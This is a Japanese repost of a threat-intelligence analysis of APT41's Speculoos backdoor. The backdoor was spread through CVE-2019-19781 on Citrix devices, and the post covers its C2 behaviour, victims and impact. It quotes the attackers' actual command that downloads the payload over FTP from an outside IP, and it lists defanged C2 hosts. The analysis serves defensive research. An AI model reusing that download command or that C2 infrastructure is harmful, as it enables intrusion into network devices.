APT41 Speculoos バックドア分析を実行する方法-安全性-php.cn

権限のないユーザーがリモートからコードを実行できるようにするインターネットにアクセス可能なデバイスは、重大なセキュリティ上の問題を引き起こします。CVE-2019-19781 は影響を及ぼします。攻撃者はこの脆弱性を積極的に悪用してカスタムバックドアをインストールします。影響を受けるすべての組織のネットワークアクティビティはこれらのネットワークデバイスを通過する必要があるため、攻撃者は組織全体のネットワークアクティビティを監視または変更する可能性があります。

ホームページ

運用・保守

安全性

APT41 Speculoos バックドア分析を実行する方法

PHPz

Jun 02, 2023 pm 10:29 PM

apt41 speculoos

FireEye は、2020 年 3 月 25 日に、APT41 の世界的な攻撃活動に関するレポートをリリースしました。この攻撃キャンペーンは 1 月 20 日から 3 月 11 日まで発生し、主に Citrix、Cisco、Zoho のネットワーク機器を標的としていました。研究者らは、WildFireとAutoFocusのデータに基づいてCitrixデバイスを標的とした攻撃サンプル「Speculoos」を入手し、北米、南米、欧州を含む世界中の複数の業界で被害者を特定した。

如何进行APT41 Speculoos后门分析

Speculoos は FreeBSD に基づいて実装されています。合計 5 つのサンプルが特定されました。すべてのサンプルのファイルサイズは基本的に同じですが、サンプル間には若干の違いがあります。サンプルセット。 Speculoos は攻撃の伝播に CVE-2019-19781 を悪用します。CVE-2019-19781 は Citrix Application Delivery Controller、Citrix Gateway、および Citrix SD-WAN WANOP に影響を及ぼし、攻撃者が任意のコマンドをリモートで実行できるようにします。

攻撃の詳細

攻撃者は CVE-2019-19781 を悪用して次のコマンドをリモートで実行しました: '/usr/bin/ftp -o /tmp/bsd ftp://test: [編集済み ]\@ 66.42.98[.]220/'。

攻撃の第一波は、2020 年 1 月 31 日の夜に始まり、bsd という名前のファイルを使用し、米国の複数の高等教育機関、米国の医療機関、アイルランドのコンサルティング会社に影響を与えました。攻撃の第 2 波は、ファイル名 un を使用して 2020 年 2 月 24 日に始まり、コロンビアの高等教育機関、オーストリアの製造組織、米国の高等教育機関、米国の州政府に影響を与えました。

BSD システムに基づくマルウェアは比較的まれですが、このツールは特定の Citrix ネットワークデバイスに関連しているため、Speculoos はこの攻撃活動専用に APT41 組織によって開発される可能性があります。

バイナリ分析

GCC 4.2.1 でコンパイルされた ELF 実行可能ファイルの Speculoos バックドアは、FreeBSD システム上で実行できます。ペイロードはターゲットに対する永続的な制御を維持できないため、攻撃者は追加のコンポーネントまたは他の攻撃方法を使用して制御を維持します。バックドアの実行後、ループが開始され、ポート 443 を介して C2 ドメインと通信し、関数

##alibaba.zzux[.]com (119.28.139[.]120) を呼び出します。 )

#通信に問題がある場合、Speculoos はポート 443 (IP アドレス 119.28.139[.]20) を介してバックアップ C2 サーバーに接続しようとします。 C2 サーバーに接続すると、サーバーとの TLS ハンドシェイクが実行されます。図 1 は、C2 サーバーに送信されるパケットを示しています。

如何进行APT41 Speculoos后门分析サーバー名表示 (SNI) として、login.live[.]com を要求します。

如何进行APT41 Speculoos后门分析 C2 への接続に成功し、TLS ハンドシェイクが完了すると、Speculoos はターゲットシステムのフィンガープリントを取得し、データを C2 サーバーに送り返します。その構造を以下の表 1 に示します。

如何进行APT41 Speculoos后门分析データは TLS チャネル経由で送信され、Speculoos はサーバーからの 2 バイトの応答を待ちます。応答を受信した後、バイト (0xa) を C2 に送信し、コマンドを待つループに入ります。表 2 は、攻撃者が実行できるコマンドを示しており、攻撃者が被害者のシステムを完全に制御できるようになります。

如何进行APT41 Speculoos后门分析研究で分析された 2 つの Speculoos サンプルは機能的に同一であり、システム情報を収集する際の「ホスト名」の違いは 8 バイトのみです。「uname -s」コマンド。 uname -s はカーネル情報を返し、hostname はホストシステム名を返します。以下の画像は、2 つの Speculoos サンプル間のバイナリ比較を示しています。

如何进行APT41 Speculoos后门分析影響評価

権限のないユーザーがリモートからコードを実行できるようにするインターネットにアクセス可能なデバイスは、重大なセキュリティ上の問題を引き起こします。CVE-2019-19781 は影響を及ぼします。攻撃者はこの脆弱性を積極的に悪用してカスタムバックドアをインストールします。影響を受けるすべての組織のネットワークアクティビティはこれらのネットワークデバイスを通過する必要があるため、攻撃者は組織全体のネットワークアクティビティを監視または変更する可能性があります。

デフォルトでは、これらのデバイスは組織のシステムに直接アクセスできるため、攻撃者は内部ネットワーク内の横方向の移動の問題を考慮する必要がありません。サイバー攻撃者は、ネットワークデータの改ざん、悪意のあるコードの挿入、中間者攻撃の実行、ユーザーを偽のログインページに誘導してログイン情報を盗むなど、さまざまな攻撃手段を使用します。

以上がAPT41 Speculoos バックドア分析を実行する方法の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

このウェブサイトの声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。